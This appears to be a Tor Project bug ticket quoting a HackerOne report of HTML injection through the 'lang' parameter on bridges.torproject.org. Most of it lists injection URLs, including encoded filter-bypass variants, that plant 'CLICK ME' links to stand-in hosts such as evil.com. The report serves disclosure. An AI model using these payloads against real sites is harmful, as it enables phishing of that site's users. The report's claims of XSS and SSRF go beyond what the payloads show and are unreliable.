HTML injection vulnerability with lang parameter
We just got the following email through the hackerone:
Hlo Sir,
I want to report the vulnerability and possible bypass methods ...i
found on your site https://torproject.org
This vulnerability is much more html injection and possible xss that may
be used by hackers in order to harm others
for phising purpose...
URL: https://bridges.torproject.org/options?lang=anonyks
this is the vulnerable url where i got my vulnerability,
the parameter is lang= (any string) [here is used AnonyKs]
then after payload is used is : "><h1>Giveaway:-P <a
href="//evil.am">CLICK ME</a> </h1>
so the url become:
URL:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="//evil.com">CLICK ME</a> </h1>
copy the url and paste it in the browser
and click on CLICK ME [ there 'click me' is show in three different
places and each redirect to evil.com]
You may fix the upper vulnerability but still there can be other ways
that hacker can use
so...
Now regarding bypass/other possible ways :
URL:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="%2f%2fevil.com">CLICK ME</a> </h1>
URL:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="http://evil.com">CLICK ME</a> </h1>
now econding,
URL:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
URL:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
URL:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22%2f%2fevil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
There are more ways , now they are without <h1> html tag
URL: https://bridges.torproject.org/options?lang=anonyks"><a
href="http://evil.com">Click Me</a>
URL: https://bridges.torproject.org/options?lang=anonyks"><a
href="//evil.com">Click Me</a>
now again encoding them,
URL:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E
URL:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E
Impact
Alogethee Today i submitted 10 vulnerability with possible bypass or
possible method that an attactr can use for crime purpose..
So in sum up all urls are:
Url: https://bridges.torproject.org/options?lang=anonyks"><a
href="//evil.com">Click Me</a>
Url: https://bridges.torproject.org/options?lang=anonyks"><a
href="http://evil.com">Click Me</a>
Url:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="%2f%2fevil.com">CLICK ME</a> </h1>
Url:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="//evil.com">CLICK ME</a> </h1>
Url:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="http://evil.com">CLICK ME</a> </h1>
Url:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E
Url:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E
Url:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
Url:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
Url:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22%2f%2fevil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
Impact:
The vulnerability allow a malicious user to inject html tags and execute
Javascript which could lead to steal user's session, peform CSRF attacks
or open a phishing page.
Broadly,
When the input fields are not properly sanitized over in a webpage, thus
sometimes this HTML Injection vulnerability might lead us to Cross-Site
Scripting(XSS) or Server-Side Request Forgery(SSRF) attacks